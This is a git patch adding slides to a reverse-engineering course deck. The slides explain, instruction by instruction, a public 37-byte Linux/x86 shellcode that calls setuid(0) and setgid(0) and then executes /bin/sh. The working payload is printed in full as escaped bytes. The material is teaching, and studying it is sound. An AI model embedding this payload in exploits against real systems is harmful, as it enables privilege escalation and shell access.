From 14d3e81177b765cfad13db7a907187a351d903da Mon Sep 17 00:00:00 2001
From: Ward Wouts <ward@wouts.nl>
Date: Wed, 15 Feb 2023 12:04:05 +0100
Subject: [PATCH] short shellcode explainer added

---
 index.html | 93 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 93 insertions(+)

diff --git a/index.html b/index.html
index 31f0d45..d2979cc 100644
--- a/index.html
+++ b/index.html
@@ -503,6 +503,99 @@ Many improvements exist to make gdb nicer for reverse engineering, such as:
 - https://github.com/longld/peda
 ]
 
+---
+template: inverse
+# Shellcode explained
+---
+.left-column[
+## Shellcode explained
+]
+.right-column[
+Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
+```
+/*
+ * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 
+ * - 37 bytes - xgc@gotfault.net
+ */
+
+  "\x6a\x17"              // push $0x17
+  "\x58"                  // pop  %eax
+  "\x31\xdb"              // xor  %ebx, %ebx
+  "\xcd\x80"              // int  $0x80
+
+  "\x6a\x2e"              // push $0x2e
+  "\x58"                  // pop  %eax
+  "\x53"                  // push %ebx
+  "\xcd\x80"              // int  $0x80
+
+  "\x31\xd2"              // xor  %edx, %edx
+  "\x6a\x0b"              // push $0xb
+  "\x58"                  // pop  %eax
+  "\x52"                  // push %edx
+  "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
+  "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
+  "\x89\xe3"              // mov  %esp, %ebx
+  "\x52"                  // push %edx
+  "\x53"                  // push %ebx
+  "\x89\xe1"              // mov  %esp, %ecx
+  "\xcd\x80"              // int  $0x80
+```
+]
+
+---
+.left-column[
+## Shellcode explained
+]
+.right-column[
+```
+  "\x6a\x17"              // push $0x17
+  "\x58"                  // pop  %eax
+  "\x31\xdb"              // xor  %ebx, %ebx
+  "\xcd\x80"              // int  $0x80
+```
+`int 0x80` is a legacy way of doing a syscall to the kernel. See also:
+http://www.linfo.org/int_0x80.html As this is a 32-bit program, the list of syscalls can be found here: `/usr/include/asm/unistd_32.h` Which shows the values in decimal: 0x17 = 23 = setuid.
+So, whats done here is put 0x17 in EAX, and make EBX (the argument for setgid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using a XOR. Then call int 0x80. Resulting in a `setuid 0`.
+]
+
+---
+.left-column[
+## Shellcode explained
+]
+.right-column[
+```
+  "\x6a\x2e"              // push $0x2e
+  "\x58"                  // pop  %eax
+  "\x53"                  // push %ebx
+  "\xcd\x80"              // int  $0x80
+```
+Pretty much the same as last snippet, but for 0x2e = 46 = setgid.
+]
+
+---
+.left-column[
+## Shellcode explained
+]
+.right-column[
+```
+  "\x31\xd2"              // xor  %edx, %edx
+  "\x6a\x0b"              // push $0xb
+  "\x58"                  // pop  %eax
+  "\x52"                  // push %edx
+  "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
+  "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
+  "\x89\xe3"              // mov  %esp, %ebx
+  "\x52"                  // push %edx
+  "\x53"                  // push %ebx
+  "\x89\xe1"              // mov  %esp, %ecx
+  "\xcd\x80"              // int  $0x80
+```
+Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to make things align on 32-bit words.
+
+The arguments for execve will not fit in registers, as they're variable size, so EBX gets a pointer to the string.
+]
+
+
     </textarea>
     <script src="https://remarkjs.com/downloads/remark-latest.min.js">
     </script>